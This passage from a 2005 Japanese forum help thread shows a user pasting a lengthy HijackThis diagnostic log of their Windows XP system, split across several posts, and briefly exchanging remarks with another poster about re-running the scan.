Inc. - C:\PROGRA~1\TRENDM~1\VIRUSB~1\tmproxy.exe O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
88 名前:66 [2005/07/30(土) 22:53:16 ID:vQUTlBEV] これで終わりです。 長くてごめんなさい。 よろしくお願いします。
89 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 22:59:41 ID:???] >>88 おまえ2回連続でスキャンしただろ、もう一回やり直しだ。
90 名前:66 [2005/07/30(土) 23:01:46 ID:vQUTlBEV] 一回だったと思うのですが…。 分かりました。もう一度やり直します。
91 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 23:02:44 ID:???] >>90 そうなの?同じだったら貼らなくていいよ。
92 名前:66 [2005/07/30(土) 23:04:00 ID:vQUTlBEV] もう一度ソフトのダウンロードからやりなおしてみたので 今から見直します。
93 名前:66 [2005/07/30(土) 23:12:31 ID:vQUTlBEV] すいません、違っているようです…。 スレ消費させてごめんなさい。 貼りなおします。
94 名前:66 [2005/07/30(土) 23:14:28 ID:vQUTlBEV] Logfile of HijackThis v1.99.1 Scan saved at 23:01:50, on 2005/07/30 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\acs.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Justsystem\OpenMG BeatJam\Plugin\bgsvclib.exe C:\Program Files\DigiOn\DiXiM Media Server\dmsf.exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\WINDOWS\system32\nmftskss.exe C:\WINDOWS\system32\NTMETER.EXE C:\PROGRA~1\TRENDM~1\VIRUSB~1\PcCtlCom.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\system32\svchost.exe C:\PROGRA~1\TRENDM~1\VIRUSB~1\Tmntsrv.exe C:\PROGRA~1\TRENDM~1\VIRUSB~1\tmproxy.exe C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe c:\Windows\System32\asrv.exe C:\WINDOWS\system32\FUSCli.exe C:\PROGRA~1\TRENDM~1\VIRUSB~1\TmPfw.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\ctfmon.exe
95 名前:66 [2005/07/30(土) 23:15:15 ID:vQUTlBEV] C:\WINDOWS\system32\rundll32.exe C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe C:\Program Files\Analog Devices\SoundMAX\Smax4.exe C:\WINDOWS\system32\igfxtray.exe C:\WINDOWS\system32\hkcmd.exe C:\Program Files\NEC\SmartVision\SVUPnPMn.exe C:\Program Files\NEC\SmartVision\SvSche.exe C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe C:\Program Files\MediaGarage\MGSplash.exe C:\Program Files\MediaGarage\MGAutoPlay.exe C:\Program Files\Java\jre1.5.0\bin\jusched.exe C:\Program Files\FaUserSW\NMUWATCH.EXE C:\Program Files\Java\jre1.5.0\bin\jucheck.exe C:\Program Files\SmartHobby\AutoDnP.exe C:\Program Files\nectvrc\tvrc.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\NECMFK\necmfk.exe C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE C:\Program Files\Real\RealPlayer\RealPlay.exe C:\Program Files\Softnavi\SNaviBTN.exe C:\Program Files\MSN Messenger\msnmsgr.exe C:\Program Files\tora3\2chtubo\tubo\_2chtubo.exe C:\Program Files\unDonut\unDonut.exe C:\Documents and Settings\YUKI-1\デスクトップ\HijackThis\HijackThis.exe O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O3 - Toolbar: BIGLOBEツールバー - {DD7EDCBC-F49A-4008-AA47-74D852489985} - C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL O3 - Toolbar: &Liquid Surf - {B9F633F6-EA44-45F4-91EB-FABFC65A0634} - C:\Program Files\LiquidSurf\sybil.dll O3 - Toolbar: (no name) - {BA52B914-B692-46c4-B683-905236F6F655} - (no file)
96 名前:66 [2005/07/30(土) 23:16:20 ID:vQUTlBEV] O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\Smax4.exe" /tray O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe O4 - HKLM\..\Run: [SHRunOnce] C:\Program Files\SmartHobby\SHRunOnce.exe O4 - HKLM\..\Run: [SVUPnPManager] C:\Program Files\NEC\SmartVision\SVUPnPMn.exe O4 - HKLM\..\Run: [SmartVisionScheduler] C:\Program Files\NEC\SmartVision\SvSche.exe O4 - HKLM\..\Run: [dms_helper] "C:\Program Files\DigiOn\DiXiM Media Server\dms_helper.exe" O4 - HKLM\..\Run: [MGSplash] C:\Program Files\MediaGarage\MGSplash.exe O4 - HKLM\..\Run: [MGAutoPlay] C:\Program Files\MediaGarage\MGAutoPlay.exe O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\Downlo~1\CnsMin.dll,Rundll32 O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\jre1.5.0\bin\jusched.exe O4 - HKLM\..\Run: [FaUserSW] C:\Program Files\FaUserSW\NMUWATCH.EXE O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET O4 - HKLM\..\Run: [IMJPMIG9.0] C:\PROGRA~1\COMMON~1\MICROS~1\IME\IMJP9\IMJPMIG.EXE /Preload /Migration32 O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
97 名前:66 [2005/07/30(土) 23:17:09 ID:vQUTlBEV] O4 - HKLM\..\Run: [NECTVRC] C:\Program Files\nectvrc\tvrc.exe O4 - HKLM\..\Run: [NECMFK] C:\Program Files\NECMFK\necmfk.exe O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Virus Buster 2005\pccguide.exe" O4 - HKLM\..\Run: [LVCOMS] C:\Program Files\Common Files\Logitech\QCDriver3\LVCOMS.EXE O4 - HKLM\..\Run: [LogitechGalleryRepair] C:\Program Files\Logitech\ImageStudio\ISStart.exe O4 - HKLM\..\Run: [LogitechImageStudioTray] C:\Program Files\Logitech\ImageStudio\LogiTray.exe O4 - HKLM\..\Run: [RealTray] C:\Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [121ポップリンク] "C:\Program Files\GTAgent\AUAgent.exe" /startup O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background O4 - HKCU\..\Run: [LDM] C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BackWeb-8876480.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000 O8 - Extra context menu item: ニュース検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_news.htm O8 - Extra context menu item: ページ検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_web.htm
98 名前:66 [2005/07/30(土) 23:17:43 ID:vQUTlBEV] O8 - Extra context menu item: 画像をマイ ピクチャへ上書き保存 - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/SCRIPT_URL.htm O8 - Extra context menu item: 画像検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_pict.htm O8 - Extra context menu item: 辞書検索(BIGLOBE) - res://C:\Program Files\BIGLOBE\Toolbar\BIGLOBE.DLL/script_dic.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing) O9 - Extra button: リサーチ - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O11 - Options group: [!CNS] JWord (日本語キーワード) O14 - IERESET.INF: START_PAGE_URL=www.biglobe.ne.jp/index-pc.html O16 - DPF: {1D7EBFD0-78EF-4A9F-BB1C-AF4762E95E8E} (VGGLoadSi Control) - www.gogosi.jp/VGGLoadSi.cab
99 名前:66 [2005/07/30(土) 23:18:34 ID:vQUTlBEV] O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab O16 - DPF: {2A7EFEAA-8059-4C69-8FE2-4BA999C3B102} (TrickCtrl Class) - https://ssl2.gcrest.com/trickster/cabs/TrickLauncher.cab O16 - DPF: {7623BE59-D4CF-4379-ABC4-B39E11854D66} (MabinogiWebAvatarRenderer Class) - avatar.mabinogi.jp/3drender/renderer/mabiweb_JP.2005.2.2.cab O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - messenger.msn.com/download/MsnMessengerSetupDownloader.cab O18 - Protocol: bw+0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw+0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw-0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw-0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw00 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw00s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
100 名前:66 [2005/07/30(土) 23:19:11 ID:vQUTlBEV] O18 - Protocol: bw10 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw10s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw20 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw20s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw30 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw30s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw40 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw40s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw50 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw50s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
101 名前:66 [2005/07/30(土) 23:19:45 ID:vQUTlBEV] O18 - Protocol: bw60 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw60s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw70 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw70s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw80 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw80s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw90 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bw90s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwa0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwa0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll
102 名前:66 [2005/07/30(土) 23:20:31 ID:vQUTlBEV] O18 - Protocol: bwb0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwb0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwc0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwc0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwd0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwd0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwe0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwe0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwf0 - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll O18 - Protocol: bwf0s - {DAC9B1F9-FDFB-46BB-94E3-706999F65DC4} - C:\Program Files\Logicool\Desktop Messenger\8876480\Program\BWPlugProtocol-8876480.dll